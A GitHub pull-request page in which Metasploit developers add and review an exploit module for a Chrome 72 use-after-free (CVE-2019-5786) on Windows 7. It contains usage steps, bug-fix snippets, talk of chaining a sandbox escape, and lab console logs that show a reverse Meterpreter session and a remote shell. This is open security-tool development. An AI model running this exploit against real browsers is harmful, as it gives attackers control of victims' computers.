Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2019-5786, exploit for Chrome 72.0.3626.119 on Windows 7 x86 #11816

Merged
merged 2 commits into from May 8, 2019

Conversation

Projects
None yet
5 participants
@timwr
Copy link
Contributor

commented May 6, 2019

This exploit takes advantage of a use after free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. Written by @exodusintel
Additional memory protections mean this exploit technique is not as straightforward on x64 versions of Windows. Additionally the sandbox must be disabled.

In the wild I believe this used CVE-2019-0808 to escape the sandbox, but I'm unsure how to chain the vulnerabilities together.

Verification

  1. Install Chrome 72.0.3626.119 on Windows 7 x86, disable chrome auto-update.
  2. C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox
  3. Start msfconsole
  4. Do: use exploit/windows/browser/chrome_filereader_uaf
  5. Do: Choose a payload and set any specific options
  6. Do: run, after a target browses to the generated URL, you should receive a session.

@timwr timwr added the module label May 6, 2019

@wchen-r7 wchen-r7 self-assigned this May 7, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 7, 2019

Love it. Can't wait to take a look at this PR. Nice job @timwr

@wchen-r7 wchen-r7 added the docs label May 7, 2019

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented May 8, 2019

Any idea how I can chain a second vulnerability from shellcode on Windows? Maybe with metasm or the reflective loader?
https://github.com/ze0r/cve-2019-0808-poc/blob/master/win7_x86/exp/exp.cpp

@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Software link:

hxxps://redirector[.]gvt1[.]com/edgedl/release2/chrome/AMavr_Q0teHn_72.0.3626.119/72.0.3626.119_chrome_installer.exe
72.0.3626.119 (Official Build) (32-bit)
send_response(cli, 'onmessage = function (msg) { }')
else
uripath = datastore['URIPATH']
uripath += '/' unless uripath[-1] == '/'

This comment has been minimized.

Copy link
@bcoles

bcoles May 8, 2019

Contributor

This is buggy. URIPATH may be nil.

msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] 172.16.191.153   chrome_filereader_uaf - Sending /Qugl6Y
[-] 172.16.191.153   chrome_filereader_uaf - Exception handling request: undefined method `[]' for nil:NilClass

I modified it like so:

      uripath = datastore['URIPATH'].to_s
      uripath += '/' unless uripath.end_with? '/'

Which fixes the error, but is still problematic. If URIPATH is not set, uripath will end up as /, which causes subsequent loading of resources to fail. ie, iframe.src = '#{uripath}exploit.html'; attempts to load /exploit.html, instead of /uniquepath/exploit.html.

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 May 8, 2019

Contributor

I noticed the same bugs as well.

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 May 8, 2019

Contributor

I think this does the trick:

      uripath = datastore['URIPATH'] || get_resource
      uripath += '/' unless uripath.end_with? '/'
@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Software link:

hxxps://redirector[.]gvt1[.]com/edgedl/release2/chrome/AMavr_Q0teHn_72.0.3626.119/72.0.3626.119_chrome_installer.exe
72.0.3626.119 (Official Build) (32-bit)

Worked on second attempt:

# ./msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

   _______________                        |*\_/*|________
  |  ___________  |     .-.     .-.      ||_/-\_|______  |
  | |           | |    .****. .****.     | |           | |
  | |   0   0   | |    .*****.*****.     | |   0   0   | |
  | |     -     | |     .*********.      | |     -     | |
  | |   \___/   | |      .*******.       | |   \___/   | |
  | |___     ___| |       .*****.        | |___________| |
  |_____|\_/|_____|        .***.         |_______________|
    _|__|/ \|_|_.............*.............._|________|_
   / ********** \                          / ********** \
 /  ************  \                      /  ************  \
--------------------                    -------------------


       =[ metasploit v5.0.21-dev-5a07d280d2               ]
+ -- --=[ 1909 exploits - 1067 auxiliary - 330 post       ]
+ -- --=[ 553 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/windows/browser/chrome_filereader_uaf 
msf5 exploit(windows/browser/chrome_filereader_uaf) > set verbose true
verbose => true
msf5 exploit(windows/browser/chrome_filereader_uaf) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/browser/chrome_filereader_uaf) > set uripath
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore

msf5 exploit(windows/browser/chrome_filereader_uaf) > set uripath /chrome
uripath => /chrome
msf5 exploit(windows/browser/chrome_filereader_uaf) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/chrome
[*] Local IP: http://172.16.191.165:8080/chrome
[*] Server started.
msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/exploit.html
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/worker.js
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/exploit.html
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/worker.js
[*] Sending stage (179779 bytes) to 172.16.191.153
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.153:49170) at 2019-05-08 05:38:47 -0400

msf5 exploit(windows/browser/chrome_filereader_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-7-ULTIMATE-\user
meterpreter > shell
Process 3588 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\AppData\Local\Google\Chrome\Application\72.0.3626.119>hostname
hostname
WIN-7-ULTIMATE-SP1-X86

C:\Users\user\AppData\Local\Google\Chrome\Application\72.0.3626.119>
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Any idea how I can chain a second vulnerability from shellcode on Windows? Maybe with metasm or the reflective loader?

Metasm is cool when you make it work, but my dev experience with Metasm has always been kind of unpleasant because it creates unpredictable results sometimes. I could be biased though.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Works for me and reliable!

msf5 exploit(windows/browser/chrome_filereader_uaf) > rerun
[*] Reloading module...
[*] Exploit running as background job 11.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.85.1:4444 
msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] Using URL: http://172.16.85.1:8080/5Fczuw
[*] Server started.
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw/exploit.html
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw/worker.js
[*] Sending stage (180291 bytes) to 172.16.85.143
[*] Meterpreter session 2 opened (172.16.85.1:4444 -> 172.16.85.143:1375) at 2019-05-08 11:16:59 -0500
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

So code to me looks okay. I'll go ahead and fix the get_resource bug and then land it. Thank you @timwr

@wchen-r7 wchen-r7 merged commit 8b489f4 into rapid7:master May 8, 2019

2 of 3 checks passed

Metasploit Automation - Sanity Test Execution Failed to pass tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request May 8, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Release Notes

The windows/browser/chrome_filereader_uaf exploit module has been added to the framework. This module exploits a use-after-free vulnerability in Google Chrome's FileReader API. The exploit specifically targets x86 Windows 7.

msjenkins-r7 added a commit that referenced this pull request May 8, 2019

@ddouhine

This comment has been minimized.

Copy link
Contributor

commented May 9, 2019

Very excited by this UaF in Chrome but unfortunately it doesn't work for me.
I probably have missed something...

Screenshot 2019-05-09 at 20 27 26

Screenshot 2019-05-09 at 20 25 57

Screenshot 2019-05-09 at 20 25 34

Screenshot 2019-05-09 at 20 25 06

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented May 10, 2019

Did you try refreshing a few times? It was a little unreliable for me. What's the OS? Windows 7 x86?
Can you see the Console logs in the inspector?
Maybe we can jump on slack and debug it together.

@timwr timwr deleted the timwr:cve_2019_5786 branch May 10, 2019

@ddouhine

This comment has been minimized.

Copy link
Contributor

commented May 10, 2019

Yes, I've tried many times.
OS is W7 SP1 x86.
Screenshot 2019-05-10 at 10 51 12

And here is what I get in the console logs:
Screenshot 2019-05-10 at 10 53 42

Of course I will be glad to debug it with you. I'll ping you on Slack.
Thx :)

@timwr
Copy link
Contributor Author

left a comment

}
function brute() {
window.setTimeout(iter, 1000);

This comment has been minimized.

Copy link
@timwr

timwr May 10, 2019

Author Contributor

@ddouhine try remove this line (window.setTimeout).

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 17, 2019

@timwr timwr referenced this pull request May 23, 2019

Open

BSOD on Windows 7 x86 #1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.